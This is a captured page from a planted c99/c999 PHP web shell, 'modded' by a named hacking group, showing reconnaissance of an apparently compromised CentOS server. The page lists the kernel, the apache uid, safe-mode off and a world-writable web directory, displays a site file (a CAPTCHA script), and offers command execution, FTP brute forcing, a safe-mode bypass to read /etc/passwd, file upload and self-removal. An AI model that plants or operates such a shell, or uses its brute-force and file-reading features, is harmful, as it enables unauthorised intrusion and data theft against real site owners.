!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/   drwxrwxrwx
Free 40.47 GB of 127.8 GB (31.66%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     imgCode.php (3.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
(GPLv2) or write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA02110-1301, USA. ********************************************************************************/ if (isset($_GET['name']) AND !eregi("[^0-9a-zA-Z_-]",$_GET['name'])) { $session_name = @$_GET['name']; header("Content-type: image/png"); $width = 180; $height = 50; $im = @imagecreate($width,$height); $bg = imagecolorallocate($im,255,255,255); //Background $colorG = imagecolorallocate($im,rand(200,255),rand(200,255),rand(200,255)); $grey = imagecolorallocate($im,180,180,180); $rx = 0; //Common bg for ($a=0;$a<=5;$a++) { $rx += 35; $x = $rx+rand(-10,5); if ($x>145) { $x = 145; } $y = rand(30,60); $color = imagecolorallocate($im,rand(100,200),rand(100,200),rand(100,200)); imageline($im,rand(0,179),rand(0,49),rand(0,179),rand(0,49),$color); imageline($im,rand(0,179),rand(0,49),rand(0,179),rand(0,49),$color); imageline($im,rand(0,179),rand(0,49),rand(0,179),rand(0,49),$color); } $gdinfo = @gd_info(); if ($gdinfo['FreeType Support']) { $chars = array(); for ($i=1;$i<=5;$i++) { $chars[] = randStr(1); } //Bg $rx = -20; foreach ($chars as $ch) { $rx += 35; $x = $rx+rand(-10,5); if ($x>145) { $x = 145; } $y = rand(30,60); $size = rand(20,70); $angle = rand(-20,20); $font = "inc/fonts/1.ttf"; imagettftext($im,$size+rand(-20,20),$angle+rand(-20,20),$x+rand(-20,20),$y+rand(-20,20),$colorG,$font,$ch); } //Text $chars = array(); for ($i=1;$i<=5;$i++) { $chars[] = randStr(1); } $text = ""; $rx = -20; foreach ($chars as $ch) { $rx += 35; $x = $rx+rand(-10,5); if ($x>145) { $x = 145; } $y = 45; $size = rand(30,50); $angle = rand(-20,20); $text .= $ch; $font = "inc/fonts/1.ttf"; $color = imagecolorallocate($im,rand(0,200),rand(0,200),rand(0,200)); imagettftext($im,$size,$angle,$x,$y,$color,$font,$ch); } } else { //Text $chars = array(); for ($i=1;$i<=5;$i++) { $chars[] = randStr(1); } $text = ""; $rx = -20; foreach ($chars as $ch) { $rx += 35; $x = $rx+rand(-10,5); if ($x>170) { $x = 170; } $y = rand(1,25); $text .= $ch; $color = imagecolorallocate($im,rand(0,200),rand(0,200),rand(0,200)); imagestring($im,5,$x-1,$y-1,$ch,$white); imagestring($im,5,$x+1,$y+1,$ch,$white); imagestring($im,5,$x,$y,$ch,$color); } imagestring($im, 3, 66, 36,"FailSafe CAPTCHA", $bg); imagestring($im, 3, 67, 37,"FailSafe CAPTCHA", $grey); } imagerectangle($im,0,0,179,49,$grey); //--------------------------------------------- @session_start(); $_SESSION[$session_name] = $text; //--------------------------------------------- imagepng($im); imagedestroy($im); } function randStr($length) { $key = ""; $pattern = "23456789AbCdEFgHikLmNPqRsTuVwXyZ"; for($i=0;$i<$length;$i++) { $key .= $pattern{rand(0,31)}; } return $key; } ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--